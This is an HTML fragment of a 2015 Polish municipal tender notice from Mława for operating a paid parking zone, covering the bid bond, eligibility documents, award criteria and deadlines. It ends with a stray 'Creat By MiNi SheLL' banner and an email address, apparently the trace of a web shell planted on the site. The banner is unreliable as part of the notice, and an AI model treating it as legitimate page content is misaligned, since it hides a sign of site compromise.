<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium w kwocie 10 000 zł (słownie: dziesięć tysięcy złotych).
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
    a) pieniądzu,
    b) poręczeniach   bankowych   lub   poręczeniach   spółdzielczej  kasy  oszczędnościowo -     kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
   c) gwarancjach bankowych,
   d) gwarancjach ubezpieczeniowych,
   e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości   (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego nr konta bankowego 40 8213 0008 2003 0400 9999 0005 w Banku Spółdzielczym w Ciechanowie Oddział w Mławie, ul. Grzebskiego 10, 06-500 Mława, z   dopiskiem: wadium przetargowe - sprawa: GKM.271.10.2015.
5. Kopię dokumentu potwierdzającego wniesienie wadium należy załączyć do koperty zawierającej ofertę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi:
- oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
- oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień  publicznych,
- wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług prowadzenia minimum jednej strefy płatnego parkowania z wykorzystanie minimum 10 parkometrów w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
- oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
- oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
- oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość zmiany treści umowy w trakcie jej realizacji w następujących przypadkach:
     a) gdy Rada Miasta Mława dokona zmian treści uchwały Nr XXIX/315/2008 z dnia  
29 grudnia 2008 r. z późn. zm. w sposób, który będzie miał bezpośredni wpływ 
na konieczność zmiany treści przedmiotu zamówienia opisanego w niniejszej SIWZ. Rozumie się przez to zmiany stawek opłat za korzystanie ze SPP, czasu pobierania opłat,
     b) gdy Wykonawca udowodni, że wpływy z opłat nie pokrywają kosztów własnych związanych z obsługą SPP przez przynajmniej trzy kolejne miesiące, po upływie okresu co najmniej sześciu miesięcy od dnia uruchomienia SPP.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mlawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Mława, ul. Padlewskiego 13, 06-500 Mława.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2015 godzina 12:00, miejsce: Urząd Miasta Mława, ul. Stary Rynek 19, 06-500 Mława.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com